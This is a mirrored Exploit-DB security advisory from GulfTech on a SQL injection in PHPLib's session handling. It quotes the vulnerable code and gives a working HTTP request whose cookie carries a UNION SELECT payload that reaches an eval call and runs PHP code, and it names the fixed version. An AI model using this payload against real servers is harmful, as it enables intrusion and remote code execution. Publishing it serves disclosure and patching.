PHPLib < 7.4 - SQL Injection

• Exploit Database
• 17 阅读

• 作者： GulfTech Security
  日期： 2016-03-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/43838/

• PHPLib SQL Injection
  
  Vendor: PHPLib
  Product: PHPLib
  Version: <= 7.4
  Website: http://phplib.sourceforge.net/
  
  BID: 16801 
  CVE: CVE-2006-0887 CVE-2006-2826 
  OSVDB: 23466 
  SECUNIA: 16902 
  
  Description:
  The PHP Base Library aka PHPLib is a toolkit for PHP developers supporting them in the development of Web applications. The phpLib codebase can be found in a number of applications available today. Unfortunately some of the session emulation code is vulnerable to SQL Injection issues that in a worst case scenario can lead to remote code execution by using UNION and selecting arbitrary php code into an eval call. A new version og PHPLib has been released and users should upgrade their PHPLib libraries as soon as possible. 
  
  
  Remote Code Execution:
  There are some serious security issues in phplib's session handling that may allow an attacker to perform a range of attacks such as SQL Injection, and/or Remote Code Execution. 
  ## Propagate the session id according to mode and lifetime.
  ## Will create a new id if necessary. To take over abandoned sessions,
  ## one may provide the new session id as a parameter (not recommended).
  
  function get_id($id = "") {
  global $HTTP_COOKIE_VARS, $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_SERVER_VARS;
  $this->newid=true;
  
  $this->name = $this->cookiename==""?$this->classname:$this->cookiename;
  
  if ( "" == $id ) {
  $this->newid=false;
  switch ($this->mode) {
  case "get":
  $id = isset($HTTP_GET_VARS[$this->name]) ?
  $HTTP_GET_VARS[$this->name] :
  ( isset($HTTP_POST_VARS[$this->name]) ?
  $HTTP_POST_VARS[$this->name] :
  "") ;
  break;
  case "cookie":
  $id = isset($HTTP_COOKIE_VARS[$this->name]) ?
  $HTTP_COOKIE_VARS[$this->name] : "";
  break;
  default:
  die("This has not been coded yet.");
  break;
  }
  }
  
  ### do not accept user provided ids for creation
  if($id != "" && $this->block_alien_sid) { # somehow an id was provided by the user
   if($this->that->ac_get_value($id, $this->name) == "") {
  # no - the id doesn't exist in the database: Ignore it!
  $id = "";
   }
  }
  
  The above code is from sessions.inc @ lines 85-121. The variable $id gets it's values from either GET or COOKIE and is never made safe before being passed to the function ac_get_value() which uses the variable in a query, thus allowing for SQL Injection. However, it is possible to manipulate the query in a way that php code is returned and passed to a vulnerable eval call. 
  GET /phplib/pages/index.php3 HTTP/1.1
  Host: example.net
  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
  Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
  Accept-Language: en-us,en;q=0.5
  Accept-Encoding: gzip,deflate
  Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
  Keep-Alive: 300
  Connection: keep-alive
  Cookie: Example_Session=' UNION SELECT 'cGhwaW5mbygpOw=='/*
  If-Modified-Since: Sat, 18 Feb 2006 18:24:34 GMT
  For example, the above request made to the index.php3 script that is shipped with phplib will successfully execute the phpinfo call. 
  
  
  Solution:
  PHPLib 7.4a has been released to address these issues. 
  
  
  Credits:
  James Bercegay of the GulfTech Security Research Team